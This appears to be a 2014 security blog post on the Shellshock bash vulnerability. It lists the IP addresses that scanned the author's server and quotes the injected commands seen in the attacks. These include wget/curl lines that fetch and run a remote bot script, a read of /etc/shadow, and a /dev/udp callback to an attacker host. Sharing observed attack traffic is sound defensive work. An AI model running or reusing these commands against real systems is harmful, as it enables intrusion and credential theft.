In April 2014, the Internet shivered when we faced the “heartbleed” bug in the OpenSSL library. It makes lot of noise across the security community and was even covered by regular media. Such issue could never happen again, right?
Never say never! Last week, a new storm in the Internet with “shellsock” or best known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed looses definitively its pole position on the top threats. It is very easy to exploit, it affects MANY applications or services that spawn other processes using call like system() on PHP or the well-know mod_cgi provided by Apache. Not only public websites can be affected by also some critical services like:
- the ForceCommand feature in sshd
- scripts executed by unspecified DHCP clients,
- network access control serices
So, any service in which the environment is defined via a bash shell execution. If you need more info about this new threat, google for it!
Some security researchers and bloggers immediately started to scan the Internet to have a better idea of the impact of this vulnerability on public services. Of course, bad guy also started to do the same and my server was hit several times (94). Until today, I detected the following IP addresses:
220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 2001:4800:7812:514:1b50:2e05:ff04:c849:52116 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206
Here is a list of commands/scripts tested:
/bin/ping -c 1 220.127.116.11 /bin/bash -c "echo testing9123123"; /bin/uname -a /sbin/ifconfig /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh" echo -e "Content-Type: text/plain\\n"; echo qQQQQQq /bin/cat /etc/shadow echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444 /bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl" /bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/" /bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 18.104.22.168" wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'
Personally, I like the one which tries to use the built-in support of sockets via psuedo files like “/dev/[tcp|udp]/<host>/<port>“. This is a nice feature of bash but it is disabled on most distribution (for security reason presicely).